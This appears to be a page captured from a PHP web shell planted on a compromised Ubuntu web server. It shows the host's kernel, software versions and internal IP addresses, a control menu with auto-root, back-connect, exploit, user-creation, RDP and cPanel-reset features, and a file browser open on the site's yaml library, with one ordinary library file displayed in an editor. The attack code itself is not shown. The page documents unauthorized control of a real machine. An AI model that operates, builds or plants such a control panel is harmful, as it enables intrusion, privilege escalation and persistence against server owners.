Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
yaml /
dist /
compose /
[ HOME SHELL ]
Name
Size
Permission
Action
compose-collection.d.ts
594
B
-rw-r--r--
compose-collection.js
3.53
KB
-rw-r--r--
compose-doc.d.ts
641
B
-rw-r--r--
compose-doc.js
1.58
KB
-rw-r--r--
compose-node.d.ts
1.22
KB
-rw-r--r--
compose-node.js
3.87
KB
-rw-r--r--
compose-scalar.d.ts
405
B
-rw-r--r--
compose-scalar.js
3.37
KB
-rw-r--r--
composer.d.ts
2.58
KB
-rw-r--r--
composer.js
8.36
KB
-rw-r--r--
resolve-block-map.d.ts
467
B
-rw-r--r--
resolve-block-map.js
4.95
KB
-rw-r--r--
resolve-block-scalar.d.ts
494
B
-rw-r--r--
resolve-block-scalar.js
7.32
KB
-rw-r--r--
resolve-block-seq.d.ts
477
B
-rw-r--r--
resolve-block-seq.js
1.78
KB
-rw-r--r--
resolve-end.d.ts
289
B
-rw-r--r--
resolve-end.js
1.23
KB
-rw-r--r--
resolve-flow-collection.d.ts
658
B
-rw-r--r--
resolve-flow-collection.js
8.74
KB
-rw-r--r--
resolve-flow-scalar.d.ts
444
B
-rw-r--r--
resolve-flow-scalar.js
7.19
KB
-rw-r--r--
resolve-props.d.ts
854
B
-rw-r--r--
resolve-props.js
5.46
KB
-rw-r--r--
util-contains-newline.d.ts
134
B
-rw-r--r--
util-contains-newline.js
1.06
KB
-rw-r--r--
util-empty-scalar-position.d.t...
164
B
-rw-r--r--
util-empty-scalar-position.js
871
B
-rw-r--r--
util-flow-indent-check.d.ts
211
B
-rw-r--r--
util-flow-indent-check.js
547
B
-rw-r--r--
util-map-includes.d.ts
269
B
-rw-r--r--
util-map-includes.js
471
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resolve-block-seq.js
'use strict'; var YAMLSeq = require('../nodes/YAMLSeq.js'); var resolveProps = require('./resolve-props.js'); var utilFlowIndentCheck = require('./util-flow-indent-check.js'); function resolveBlockSeq({ composeNode, composeEmptyNode }, ctx, bs, onError, tag) { const NodeClass = tag?.nodeClass ?? YAMLSeq.YAMLSeq; const seq = new NodeClass(ctx.schema); if (ctx.atRoot) ctx.atRoot = false; if (ctx.atKey) ctx.atKey = false; let offset = bs.offset; let commentEnd = null; for (const { start, value } of bs.items) { const props = resolveProps.resolveProps(start, { indicator: 'seq-item-ind', next: value, offset, onError, parentIndent: bs.indent, startOnNewline: true }); if (!props.found) { if (props.anchor || props.tag || value) { if (value && value.type === 'block-seq') onError(props.end, 'BAD_INDENT', 'All sequence items must start at the same column'); else onError(offset, 'MISSING_CHAR', 'Sequence item without - indicator'); } else { commentEnd = props.end; if (props.comment) seq.comment = props.comment; continue; } } const node = value ? composeNode(ctx, value, props, onError) : composeEmptyNode(ctx, props.end, start, null, props, onError); if (ctx.schema.compat) utilFlowIndentCheck.flowIndentCheck(bs.indent, value, onError); offset = node.range[2]; seq.items.push(node); } seq.range = [bs.offset, offset, commentEnd ?? offset]; return seq; } exports.resolveBlockSeq = resolveBlockSeq;
Close